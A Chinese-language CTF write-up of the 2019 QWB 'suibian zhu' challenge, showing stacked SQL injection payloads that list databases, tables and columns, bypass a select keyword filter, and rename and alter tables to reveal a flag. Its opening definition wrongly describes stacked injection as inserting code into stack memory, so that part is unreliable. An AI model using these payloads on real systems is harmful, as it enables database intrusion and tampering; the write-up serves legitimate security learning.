堆叠注入([强网杯 2019]随便注1)

详解:

堆叠注入(Stack Injection)是一种计算机安全概念,涉及攻击者向程序的堆栈内存中插入恶意代码,以便在程序执行期间执行非预期的操作。

堆栈注入攻击通常利用程序在处理函数调用时使用的堆栈机制。当一个函数被调用时,程序将在堆栈中为其分配内存以保存局部变量和返回地址。攻击者可以找到并修改这些堆栈中的值,将恶意代码插入到程序的执行流程中。

堆叠注入攻击通常需要攻击者对目标程序的运行环境和代码结构有一定的了解。攻击者可能需要了解目标程序的输入格式、函数调用方式和内存管理机制等方面的知识。

堆叠注入攻击具有很高的危害性,因为攻击者可以在程序执行期间执行任意代码,包括窃取敏感数据、破坏系统安全和破坏应用程序的正常运行。为了防止堆叠注入攻击,可以采取以下措施:

  • 对输入数据进行验证和过滤,确保输入符合预期格式,并防止恶意代码注入。
  • 使用安全的编程技巧,例如避免使用不安全的函数和避免将数据直接传递给系统调用。
  • 实施安全防护措施,例如使用防火墙、入侵检测系统和安全扫描工具来检测和防御堆叠注入攻击。
  • 对代码进行安全审计和漏洞分析,发现潜在的安全漏洞并进行修复。

测试:

1.输入1测试一下

2.用1'测试

有报错,说明用'闭合的闭合方式 同时可以确定有可能使用的是报错注入

3.select查询是否有过滤

发现过滤关键字("/select|update|delete|drop|insert|where|\./i")而且不区分大小写,发现select被过滤,联合查询,布尔,时间盲注,报错注入都不能用,只能使用堆叠注入

4.尝试使用堆叠注入,查询数据库

复制代码
1'; show databases; #

5.查询表

复制代码
1'; show tables; #

5.存在两张表,分别查询

复制代码
1'; show columns from `words`; #
1'; show columns from `1919810931114514`; #

注意`这个符号是转义符,表明这里面的是数据库里面的内容

在`1919810931114514`表中发现flag字段。

找到flag字段之后,怎么也查询不到flag字段中的数据,select被过滤,后面是参考大佬的做法

让程序中已经存在的select语法帮我们进行查询,把words改名为其他,191这个表改名为words,然后再添加id字段,将flag字段改为data。

先将 words 改为别的名字 比如 words2 或者其他

然后将 1919810931114514 改为 words

把属性名flag改为id,然后用1' or 1=1;# 显示flag出来

在这之前当然要先把words表改名为其他。

直接构造payload

复制代码
1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100); #

6.表修改之后,再次查询表

修改成功

7.直接查询字段

相关推荐
视觉&物联智能5 分钟前
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
网络·人工智能·web安全·网络安全·安全威胁分析
博睿谷IT99_13 分钟前
网络安全怎么入门?快速了解
安全·web安全
八股文领域大手子1 小时前
深入理解缓存淘汰策略:LRU 与 LFU 算法详解及 Java 实现
java·数据库·算法·缓存·mybatis·哈希算法
noravinsc1 小时前
django admin 中更新表数据 之后再将数据返回管理界面
数据库·django·sqlite
春风不会绿大地1 小时前
IDEA编写flinkSQL(快速体验版本,--无需配置环境)
sql·flink
学习溢出1 小时前
【网络安全】网络钓鱼的类型
网络·安全·网络安全·网络钓鱼·社会工程
fmingzh2 小时前
NVIDIA高级辅助驾驶安全与技术读后感
人工智能·安全·自动驾驶
Bruce-li__3 小时前
DRF凭什么更高效?Django原生API与DRF框架开发对比解析
数据库·django·sqlite
Blossom.1183 小时前
量子网络:构建未来通信的超高速“高速公路”
网络·opencv·算法·安全·机器学习·密码学·量子计算
落——枫3 小时前
网络安全知识点3
安全·web安全